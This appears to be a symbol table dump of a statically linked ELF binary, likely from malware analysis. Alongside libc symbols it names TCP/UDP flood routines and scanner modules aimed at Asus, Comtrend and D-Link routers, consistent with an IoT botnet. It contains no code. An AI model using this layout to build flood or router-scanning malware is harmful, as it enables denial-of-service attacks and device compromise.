__GI_sprintf	.symtab	0x4143c8	132	FUNC	<unknown>	HIDDEN	2
__GI_srandom_r	.symtab	0x4173a8	204	FUNC	<unknown>	HIDDEN	2
__GI_stat	.symtab	0x413e30	96	FUNC	<unknown>	HIDDEN	2
__GI_strchr	.symtab	0x41ad68	196	FUNC	<unknown>	HIDDEN	2
__GI_strchrnul	.symtab	0x41ae2c	192	FUNC	<unknown>	HIDDEN	2
__GI_strcmp	.symtab	0x41aeec	34	FUNC	<unknown>	HIDDEN	2
__GI_strcoll	.symtab	0x41aeec	34	FUNC	<unknown>	HIDDEN	2
__GI_strcspn	.symtab	0x41af10	72	FUNC	<unknown>	HIDDEN	2
__GI_strdup	.symtab	0x415bbc	76	FUNC	<unknown>	HIDDEN	2
__GI_strlen	.symtab	0x415360	88	FUNC	<unknown>	HIDDEN	2
__GI_strnlen	.symtab	0x41597c	136	FUNC	<unknown>	HIDDEN	2
__GI_strpbrk	.symtab	0x41b050	44	FUNC	<unknown>	HIDDEN	2
__GI_strrchr	.symtab	0x41af58	80	FUNC	<unknown>	HIDDEN	2
__GI_strspn	.symtab	0x41afa8	48	FUNC	<unknown>	HIDDEN	2
__GI_strstr	.symtab	0x415a04	182	FUNC	<unknown>	HIDDEN	2
__GI_strtok	.symtab	0x415c08	24	FUNC	<unknown>	HIDDEN	2
__GI_strtok_r	.symtab	0x41afd8	120	FUNC	<unknown>	HIDDEN	2
__GI_sysconf	.symtab	0x4177a0	1032	FUNC	<unknown>	HIDDEN	2
__GI_tcgetattr	.symtab	0x41b0a0	116	FUNC	<unknown>	HIDDEN	2
__GI_time	.symtab	0x413e90	16	FUNC	<unknown>	HIDDEN	2
__GI_times	.symtab	0x419234	16	FUNC	<unknown>	HIDDEN	2
__GI_unlink	.symtab	0x419244	60	FUNC	<unknown>	HIDDEN	2
__GI_vsnprintf	.symtab	0x41444c	180	FUNC	<unknown>	HIDDEN	2
__GI_waitpid	.symtab	0x41b320	172	FUNC	<unknown>	HIDDEN	2
__GI_wcrtomb	.symtab	0x419638	68	FUNC	<unknown>	HIDDEN	2
__GI_wcsnrtombs	.symtab	0x41969c	124	FUNC	<unknown>	HIDDEN	2
__GI_wcsrtombs	.symtab	0x41967c	32	FUNC	<unknown>	HIDDEN	2
__GI_write	.symtab	0x4181c0	172	FUNC	<unknown>	HIDDEN	2
__JCR_END__	.symtab	0x430188	0	OBJECT	<unknown>	DEFAULT	9
__JCR_LIST__	.symtab	0x430188	0	OBJECT	<unknown>	DEFAULT	9
__app_fini	.symtab	0x430dc0	4	OBJECT	<unknown>	HIDDEN	12
__atexit_lock	.symtab	0x430300	24	OBJECT	<unknown>	DEFAULT	10
__bss_start	.symtab	0x430428	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__check_one_fd	.symtab	0x418544	72	FUNC	<unknown>	DEFAULT	2
__close	.symtab	0x417fc0	164	FUNC	<unknown>	DEFAULT	2
__close_nocancel	.symtab	0x417fd0	40	FUNC	<unknown>	DEFAULT	2
__ctype_b	.symtab	0x430328	4	OBJECT	<unknown>	DEFAULT	10
__curbrk	.symtab	0x433354	4	OBJECT	<unknown>	HIDDEN	12
__data_start	.symtab	0x43018c	0	NOTYPE	<unknown>	DEFAULT	10
__deregister_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__do_global_ctors_aux	.symtab	0x41bf20	0	FUNC	<unknown>	DEFAULT	2
__do_global_dtors_aux	.symtab	0x400100	0	FUNC	<unknown>	DEFAULT	2
__dso_handle	.symtab	0x43018c	0	OBJECT	<unknown>	HIDDEN	10
__environ	.symtab	0x430db8	4	OBJECT	<unknown>	DEFAULT	12
__errno_location	.symtab	0x4142e8	44	FUNC	<unknown>	DEFAULT	2
__errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__exit_cleanup	.symtab	0x430868	4	OBJECT	<unknown>	HIDDEN	12
__fcntl_nocancel	.symtab	0x413a64	180	FUNC	<unknown>	DEFAULT	2
__fgetc_unlocked	.symtab	0x41aac8	216	FUNC	<unknown>	DEFAULT	2
__fini_array_end	.symtab	0x430178	0	NOTYPE	<unknown>	HIDDEN	6
__fini_array_start	.symtab	0x430178	0	NOTYPE	<unknown>	HIDDEN	6
__fork	.symtab	0x417ba8	572	FUNC	<unknown>	DEFAULT	2
__fork_generation_pointer	.symtab	0x4337a0	4	OBJECT	<unknown>	HIDDEN	12
__fork_handlers	.symtab	0x4337a4	4	OBJECT	<unknown>	HIDDEN	12
__fork_lock	.symtab	0x43086c	4	OBJECT	<unknown>	HIDDEN	12
__getdents	.symtab	0x418ecc	176	FUNC	<unknown>	HIDDEN	2
__getdents64	.symtab	0x41b850	276	FUNC	<unknown>	HIDDEN	2
__getpagesize	.symtab	0x418fe8	28	FUNC	<unknown>	DEFAULT	2
__getpid	.symtab	0x417de4	52	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r	.symtab	0x415abc	32	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__h_errno_location	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__init_array_end	.symtab	0x430178	0	NOTYPE	<unknown>	HIDDEN	6
__init_array_start	.symtab	0x430178	0	NOTYPE	<unknown>	HIDDEN	6
__init_brk	.symtab	0x41b6b0	84	FUNC	<unknown>	HIDDEN	2
__init_brk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__libc_accept	.symtab	0x415c8c	116	FUNC	<unknown>	DEFAULT	2
__libc_close	.symtab	0x417fc0	164	FUNC	<unknown>	DEFAULT	2
__libc_connect	.symtab	0x415d80	116	FUNC	<unknown>	DEFAULT	2
__libc_disable_asynccancel	.symtab	0x418380	136	FUNC	<unknown>	HIDDEN	2
__libc_enable_asynccancel	.symtab	0x418408	136	FUNC	<unknown>	HIDDEN	2
__libc_errno	.symtab	0x0	4	TLS	<unknown>	HIDDEN	6
__libc_fcntl	.symtab	0x413b18	280	FUNC	<unknown>	DEFAULT	2
__libc_fork	.symtab	0x417ba8	572	FUNC	<unknown>	DEFAULT	2
__libc_h_errno	.symtab	0x4	4	TLS	<unknown>	HIDDEN	6
__libc_nanosleep	.symtab	0x419118	108	FUNC	<unknown>	DEFAULT	2
__libc_open	.symtab	0x4180c0	172	FUNC	<unknown>	DEFAULT	2
__libc_read	.symtab	0x4182c0	172	FUNC	<unknown>	DEFAULT	2
__libc_recv	.symtab	0x415ef8	128	FUNC	<unknown>	DEFAULT	2
__libc_recvfrom	.symtab	0x415fbc	144	FUNC	<unknown>	DEFAULT	2
__libc_select	.symtab	0x413d6c	136	FUNC	<unknown>	DEFAULT	2
__libc_send	.symtab	0x41608c	128	FUNC	<unknown>	DEFAULT	2
__libc_sendto	.symtab	0x416150	144	FUNC	<unknown>	DEFAULT	2
__libc_setup_tls	.symtab	0x41b472	366	FUNC	<unknown>	DEFAULT	2
__libc_sigaction	.symtab	0x41b1dc	20	FUNC	<unknown>	DEFAULT	2
__libc_stack_end	.symtab	0x430db4	4	OBJECT	<unknown>	DEFAULT	12
__libc_system	.symtab	0x418cac	120	FUNC	<unknown>	DEFAULT	2
__libc_waitpid	.symtab	0x41b320	172	FUNC	<unknown>	DEFAULT	2
__libc_write	.symtab	0x4181c0	172	FUNC	<unknown>	DEFAULT	2
__lll_lock_wait_private	.symtab	0x41b280	64	FUNC	<unknown>	HIDDEN	2
__lll_unlock_wake_private	.symtab	0x41b2c0	30	FUNC	<unknown>	HIDDEN	2
__malloc_consolidate	.symtab	0x416dcc	328	FUNC	<unknown>	HIDDEN	2
__malloc_largebin_index	.symtab	0x416264	112	FUNC	<unknown>	DEFAULT	2
__malloc_lock	.symtab	0x430224	24	OBJECT	<unknown>	DEFAULT	10
__malloc_state	.symtab	0x433428	888	OBJECT	<unknown>	DEFAULT	12
__malloc_trim	.symtab	0x416d30	156	FUNC	<unknown>	DEFAULT	2
__movmemSI12_i4	.symtab	0x41bf00	14	FUNC	<unknown>	HIDDEN	2
__movmem_i4_even	.symtab	0x41bec8	48	FUNC	<unknown>	HIDDEN	2
__movmem_i4_odd	.symtab	0x41bece	42	FUNC	<unknown>	HIDDEN	2
__movstrSI12_i4	.symtab	0x41bf00	14	FUNC	<unknown>	HIDDEN	2
__movstr_i4_even	.symtab	0x41bec8	48	FUNC	<unknown>	HIDDEN	2
__movstr_i4_odd	.symtab	0x41bece	42	FUNC	<unknown>	HIDDEN	2
__nptl_deallocate_tsd	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__nptl_nthreads	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__open	.symtab	0x4180c0	172	FUNC	<unknown>	DEFAULT	2
__open_nocancel	.symtab	0x4180d0	40	FUNC	<unknown>	DEFAULT	2
__pagesize	.symtab	0x430dbc	4	OBJECT	<unknown>	DEFAULT	12
__preinit_array_end	.symtab	0x430178	0	NOTYPE	<unknown>	HIDDEN	6
__preinit_array_start	.symtab	0x430178	0	NOTYPE	<unknown>	HIDDEN	6
__progname	.symtab	0x43031c	4	OBJECT	<unknown>	DEFAULT	10
__progname_full	.symtab	0x430320	4	OBJECT	<unknown>	DEFAULT	10
__pthread_initialize_minimal	.symtab	0x41b5e0	24	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_init	.symtab	0x41849e	14	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_lock	.symtab	0x418490	14	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_trylock	.symtab	0x418490	14	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_unlock	.symtab	0x418490	14	FUNC	<unknown>	DEFAULT	2
__pthread_return_0	.symtab	0x418490	14	FUNC	<unknown>	DEFAULT	2
__pthread_unwind	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__read	.symtab	0x4182c0	172	FUNC	<unknown>	DEFAULT	2
__read_nocancel	.symtab	0x4182d0	40	FUNC	<unknown>	DEFAULT	2
__register_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__rtld_fini	.symtab	0x430dc4	4	OBJECT	<unknown>	HIDDEN	12
__sdivsi3_i4i	.symtab	0x413710	852	FUNC	<unknown>	HIDDEN	2
__sigjmp_save	.symtab	0x41b1f0	56	FUNC	<unknown>	HIDDEN	2
__sigsetjmp	.symtab	0x418df0	60	FUNC	<unknown>	DEFAULT	2
__sigsetjmp_intern	.symtab	0x418df4	0	NOTYPE	<unknown>	DEFAULT	2
__stdin	.symtab	0x430338	4	OBJECT	<unknown>	DEFAULT	10
__stdio_READ	.symtab	0x41babc	80	FUNC	<unknown>	HIDDEN	2
__stdio_WRITE	.symtab	0x41bb0c	192	FUNC	<unknown>	HIDDEN	2
__stdio_adjust_position	.symtab	0x41bbcc	196	FUNC	<unknown>	HIDDEN	2
__stdio_fwrite	.symtab	0x419bc8	264	FUNC	<unknown>	HIDDEN	2
__stdio_rfill	.symtab	0x41bc90	48	FUNC	<unknown>	HIDDEN	2
__stdio_seek	.symtab	0x41bd4c	52	FUNC	<unknown>	HIDDEN	2
__stdio_trans2r_o	.symtab	0x41bcc0	140	FUNC	<unknown>	HIDDEN	2
__stdio_trans2w_o	.symtab	0x419e40	196	FUNC	<unknown>	HIDDEN	2
__stdio_wcommit	.symtab	0x419f04	52	FUNC	<unknown>	HIDDEN	2
__stdout	.symtab	0x43033c	4	OBJECT	<unknown>	DEFAULT	10
__sys_accept	.symtab	0x415c4c	64	FUNC	<unknown>	DEFAULT	2
__sys_connect	.symtab	0x415d40	64	FUNC	<unknown>	DEFAULT	2
__sys_recv	.symtab	0x415eb8	64	FUNC	<unknown>	DEFAULT	2
__sys_recvfrom	.symtab	0x415f78	68	FUNC	<unknown>	DEFAULT	2
__sys_send	.symtab	0x41604c	64	FUNC	<unknown>	DEFAULT	2
__sys_sendto	.symtab	0x41610c	68	FUNC	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x415320	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x4153c0	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x4157e0	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x417f80	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x418080	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x418180	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x418280	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x41ac40	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x41b240	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_error	.symtab	0x41b2e0	0	NOTYPE	<unknown>	DEFAULT	2
__syscall_fcntl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_nanosleep	.symtab	0x4190d8	64	FUNC	<unknown>	DEFAULT	2
__syscall_rt_sigaction	.symtab	0x41b704	64	FUNC	<unknown>	DEFAULT	2
__syscall_rt_sigaction.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_select	.symtab	0x413d28	68	FUNC	<unknown>	DEFAULT	2
__tls_get_addr	.symtab	0x41b45c	22	FUNC	<unknown>	DEFAULT	2
__uClibc_fini	.symtab	0x4184d8	108	FUNC	<unknown>	DEFAULT	2
__uClibc_init	.symtab	0x41858c	68	FUNC	<unknown>	DEFAULT	2
__uClibc_main	.symtab	0x4185d0	660	FUNC	<unknown>	DEFAULT	2
__uClibc_main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__uclibc_progname	.symtab	0x430318	4	OBJECT	<unknown>	HIDDEN	10
__udivsi3_i4i	.symtab	0x413640	208	FUNC	<unknown>	HIDDEN	2
__waitpid	.symtab	0x41b320	172	FUNC	<unknown>	DEFAULT	2
__waitpid_nocancel	.symtab	0x41b330	40	FUNC	<unknown>	DEFAULT	2
__write	.symtab	0x4181c0	172	FUNC	<unknown>	DEFAULT	2
__write_nocancel	.symtab	0x4181d0	40	FUNC	<unknown>	DEFAULT	2
__xpg_strerror_r	.symtab	0x415adc	224	FUNC	<unknown>	DEFAULT	2
__xpg_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__xstat32_conv	.symtab	0x413f2c	128	FUNC	<unknown>	HIDDEN	2
__xstat64_conv	.symtab	0x413ea0	140	FUNC	<unknown>	HIDDEN	2
_adjust_pos.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_brk	.symtab	0x41b674	60	FUNC	<unknown>	HIDDEN	2
_bss_custom_printf_spec	.symtab	0x430854	10	OBJECT	<unknown>	DEFAULT	12
_charpad	.symtab	0x414500	88	FUNC	<unknown>	DEFAULT	2
_cs_funcs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_custom_printf_arginfo	.symtab	0x4333d8	40	OBJECT	<unknown>	HIDDEN	12
_custom_printf_handler	.symtab	0x433400	40	OBJECT	<unknown>	HIDDEN	12
_custom_printf_spec	.symtab	0x430220	4	OBJECT	<unknown>	HIDDEN	10
_dl_aux_init	.symtab	0x41b5f8	32	FUNC	<unknown>	DEFAULT	2
_dl_nothread_init_static_tls	.symtab	0x41b618	92	FUNC	<unknown>	HIDDEN	2
_dl_phdr	.symtab	0x4337c8	4	OBJECT	<unknown>	DEFAULT	12
_dl_phnum	.symtab	0x4337cc	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_dtv_gaps	.symtab	0x4337bc	1	OBJECT	<unknown>	DEFAULT	12
_dl_tls_dtv_slotinfo_list	.symtab	0x4337b8	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_generation	.symtab	0x4337c0	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_max_dtv_idx	.symtab	0x4337b0	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_setup	.symtab	0x41b420	60	FUNC	<unknown>	DEFAULT	2
_dl_tls_static_align	.symtab	0x4337ac	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_static_nelem	.symtab	0x4337c4	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_static_size	.symtab	0x4337b4	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_static_used	.symtab	0x4337a8	4	OBJECT	<unknown>	DEFAULT	12
_edata	.symtab	0x430428	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_end	.symtab	0x4337d0	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_exit	.symtab	0x413c30	104	FUNC	<unknown>	DEFAULT	2
_exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fini	.symtab	0x41bf60	0	FUNC	<unknown>	HIDDEN	3
_fixed_buffers	.symtab	0x430e18	8192	OBJECT	<unknown>	DEFAULT	12
_fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fp_out_narrow	.symtab	0x414558	124	FUNC	<unknown>	DEFAULT	2
_fpmaxtostr	.symtab	0x41a0d0	1256	FUNC	<unknown>	HIDDEN	2
_fpmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fwrite.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_init	.symtab	0x4000b4	0	FUNC	<unknown>	HIDDEN	1
_load_inttype	.symtab	0x419f38	94	FUNC	<unknown>	HIDDEN	2
_load_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_init	.symtab	0x414b60	124	FUNC	<unknown>	HIDDEN	2
_ppfs_init.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_parsespec	.symtab	0x414e28	1024	FUNC	<unknown>	HIDDEN	2
_ppfs_parsespec.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_prepargs	.symtab	0x414bdc	72	FUNC	<unknown>	HIDDEN	2
_ppfs_prepargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_setargs	.symtab	0x414c24	456	FUNC	<unknown>	HIDDEN	2
_ppfs_setargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_promoted_size	.symtab	0x414dec	60	FUNC	<unknown>	DEFAULT	2
_pthread_cleanup_pop_restore	.symtab	0x4184bc	28	FUNC	<unknown>	DEFAULT	2
_pthread_cleanup_push_defer	.symtab	0x4184ac	16	FUNC	<unknown>	DEFAULT	2
_rfill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_setjmp	.symtab	0x418dd0	4	FUNC	<unknown>	DEFAULT	2
_start	.symtab	0x4001c0	30	FUNC	<unknown>	DEFAULT	2
_stdio.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_stdio_fopen	.symtab	0x4198ec	732	FUNC	<unknown>	HIDDEN	2
_stdio_init	.symtab	0x419cd0	116	FUNC	<unknown>	HIDDEN	2
_stdio_openlist	.symtab	0x430340	4	OBJECT	<unknown>	DEFAULT	10
_stdio_openlist_add_lock	.symtab	0x430df8	12	OBJECT	<unknown>	DEFAULT	12
_stdio_openlist_dec_use	.symtab	0x41a748	380	FUNC	<unknown>	HIDDEN	2
_stdio_openlist_del_count	.symtab	0x430e14	4	OBJECT	<unknown>	DEFAULT	12
_stdio_openlist_del_lock	.symtab	0x430e04	12	OBJECT	<unknown>	DEFAULT	12
_stdio_openlist_use_count	.symtab	0x430e10	4	OBJECT	<unknown>	DEFAULT	12
_stdio_streams	.symtab	0x430348	204	OBJECT	<unknown>	DEFAULT	10
_stdio_term	.symtab	0x419d44	252	FUNC	<unknown>	HIDDEN	2
_stdio_user_locking	.symtab	0x430344	4	OBJECT	<unknown>	DEFAULT	10
_store_inttype	.symtab	0x419f96	56	FUNC	<unknown>	HIDDEN	2
_store_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_string_syserrmsgs	.symtab	0x41f170	2906	OBJECT	<unknown>	HIDDEN	4
_string_syserrmsgs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2w.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_uintmaxtostr	.symtab	0x419fd0	256	FUNC	<unknown>	HIDDEN	2
_uintmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_vfprintf_internal	.symtab	0x4145d4	1420	FUNC	<unknown>	HIDDEN	2
_vfprintf_internal.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_wcommit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
abort	.symtab	0x4170c8	184	FUNC	<unknown>	DEFAULT	2
abort.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
accept	.symtab	0x415c8c	116	FUNC	<unknown>	DEFAULT	2
accept.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
arch_names	.symtab	0x41d8a8	32	OBJECT	<unknown>	DEFAULT	4
asus.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
asus_fake_time	.symtab	0x430474	4	OBJECT	<unknown>	DEFAULT	12
asus_init	.symtab	0x4002c0	2816	FUNC	<unknown>	DEFAULT	2
asus_rsck	.symtab	0x430448	4	OBJECT	<unknown>	DEFAULT	12
asus_scanner_pid	.symtab	0x430444	4	OBJECT	<unknown>	DEFAULT	12
asus_scanner_rawpkt	.symtab	0x43044c	40	OBJECT	<unknown>	DEFAULT	12
asus_setup_connection	.symtab	0x400200	188	FUNC	<unknown>	DEFAULT	2
attack.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_get_opt_int	.symtab	0x401280	136	FUNC	<unknown>	DEFAULT	2
attack_get_opt_ip	.symtab	0x4011e0	136	FUNC	<unknown>	DEFAULT	2
attack_init	.symtab	0x401320	624	FUNC	<unknown>	DEFAULT	2
attack_kill_all	.symtab	0x400ec0	220	FUNC	<unknown>	DEFAULT	2
attack_method_nudp	.symtab	0x4046c0	1480	FUNC	<unknown>	DEFAULT	2
attack_method_stdhex	.symtab	0x404400	704	FUNC	<unknown>	DEFAULT	2
attack_method_tcp	.symtab	0x401b60	1476	FUNC	<unknown>	DEFAULT	2
attack_ongoing	.symtab	0x430480	32	OBJECT	<unknown>	DEFAULT	12
attack_parse	.symtab	0x400fa0	552	FUNC	<unknown>	DEFAULT	2
attack_start	.symtab	0x400dc0	228	FUNC	<unknown>	DEFAULT	2
attack_tcp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_tcp_ack	.symtab	0x402e40	1544	FUNC	<unknown>	DEFAULT	2
attack_tcp_null	.symtab	0x403a60	1700	FUNC	<unknown>	DEFAULT	2
attack_tcp_sack2	.symtab	0x402140	1508	FUNC	<unknown>	DEFAULT	2
attack_tcp_stomp	.symtab	0x402740	1792	FUNC	<unknown>	DEFAULT	2
attack_tcp_syn	.symtab	0x4015a0	1464	FUNC	<unknown>	DEFAULT	2
attack_tcp_syndata	.symtab	0x403460	1512	FUNC	<unknown>	DEFAULT	2
attack_udp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_udp_plain	.symtab	0x404140	692	FUNC	<unknown>	DEFAULT	2
been_there_done_that	.symtab	0x430864	4	OBJECT	<unknown>	DEFAULT	12
bind	.symtab	0x415d00	64	FUNC	<unknown>	DEFAULT	2
bind.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
blink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
calloc	.symtab	0x416998	228	FUNC	<unknown>	DEFAULT	2
calloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
cancel_handler	.symtab	0x418864	240	FUNC	<unknown>	DEFAULT	2
checksum.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum_generic	.symtab	0x4058a0	52	FUNC	<unknown>	DEFAULT	2
checksum_tcpudp	.symtab	0x4058e0	140	FUNC	<unknown>	DEFAULT	2
clock	.symtab	0x414314	56	FUNC	<unknown>	DEFAULT	2
clock.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
close	.symtab	0x417fc0	164	FUNC	<unknown>	DEFAULT	2
closedir	.symtab	0x413fac	200	FUNC	<unknown>	DEFAULT	2
closedir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
completed.4720	.symtab	0x430428	1	OBJECT	<unknown>	DEFAULT	12
comtrend.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
comtrend_fake_time	.symtab	0x430508	4	OBJECT	<unknown>	DEFAULT	12
comtrend_init	.symtab	0x405a40	3108	FUNC	<unknown>	DEFAULT	2
comtrend_init_pid	.symtab	0x4304d8	4	OBJECT	<unknown>	DEFAULT	12
comtrend_init_rawpkt	.symtab	0x4304e0	40	OBJECT	<unknown>	DEFAULT	12
comtrend_range	.symtab	0x430198	36	OBJECT	<unknown>	DEFAULT	10
comtrend_rsck	.symtab	0x4304dc	4	OBJECT	<unknown>	DEFAULT	12
comtrend_setup_connection	.symtab	0x405980	188	FUNC	<unknown>	DEFAULT	2
conn_table	.symtab	0x4304d4	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x4306fc	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x4307ac	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x4307e4	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x430850	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x433358	4	OBJECT	<unknown>	DEFAULT	12
connect	.symtab	0x415d80	116	FUNC	<unknown>	DEFAULT	2
connect.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crti.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtn.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dl-support.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dlink_init	.symtab	0x406740	2816	FUNC	<unknown>	DEFAULT	2
dlinkscanner_fake_time	.symtab	0x43053c	4	OBJECT	<unknown>	DEFAULT	12
dlinkscanner_rsck	.symtab	0x430510	4	OBJECT	<unknown>	DEFAULT	12
dlinkscanner_scanner_pid	.symtab	0x43050c	4	OBJECT	<unknown>	DEFAULT	12
dlinkscanner_scanner_rawpkt	.symtab	0x430514	40	OBJECT	<unknown>	DEFAULT	12
dlinkscanner_setup_connection	.symtab	0x406680	188	FUNC	<unknown>	DEFAULT	2
do_system	.symtab	0x418954	856	FUNC	<unknown>	DEFAULT	2
entries	.symtab	0x433388	4	OBJECT	<unknown>	DEFAULT	12
environ	.symtab	0x430db8	4	OBJECT	<unknown>	DEFAULT	12
errno	.symtab	0x0	4	TLS	<unknown>	DEFAULT	6
errno.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
execve	.symtab	0x418e30	60	FUNC	<unknown>	DEFAULT	2
execve.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exit	.symtab	0x417624	116	FUNC	<unknown>	DEFAULT	2
exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exp10_table	.symtab	0x4200b4	72	OBJECT	<unknown>	DEFAULT	4
fclose	.symtab	0x419718	444	FUNC	<unknown>	DEFAULT	2
fclose.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fcntl	.symtab	0x413b18	280	FUNC	<unknown>	DEFAULT	2
fd_ctrl	.symtab	0x4301ec	4	OBJECT	<unknown>	DEFAULT	10
fd_serv	.symtab	0x4301f0	4	OBJECT	<unknown>	DEFAULT	10
fd_to_DIR	.symtab	0x414074	144	FUNC	<unknown>	DEFAULT	2
fdopendir	.symtab	0x4141b4	160	FUNC	<unknown>	DEFAULT	2
fflush_unlocked	.symtab	0x41a8c4	516	FUNC	<unknown>	DEFAULT	2
fflush_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc	.symtab	0x41a5b8	212	FUNC	<unknown>	DEFAULT	2
fgetc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc_unlocked	.symtab	0x41aac8	216	FUNC	<unknown>	DEFAULT	2
fgetc_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets	.symtab	0x41a68c	188	FUNC	<unknown>	DEFAULT	2
fgets.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets_unlocked	.symtab	0x41aba0	132	FUNC	<unknown>	DEFAULT	2
fgets_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
first_connect	.symtab	0x43067c	4	OBJECT	<unknown>	DEFAULT	12
fmt	.symtab	0x4200a0	20	OBJECT	<unknown>	DEFAULT	4
fopen	.symtab	0x4198d4	24	FUNC	<unknown>	DEFAULT	2
fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
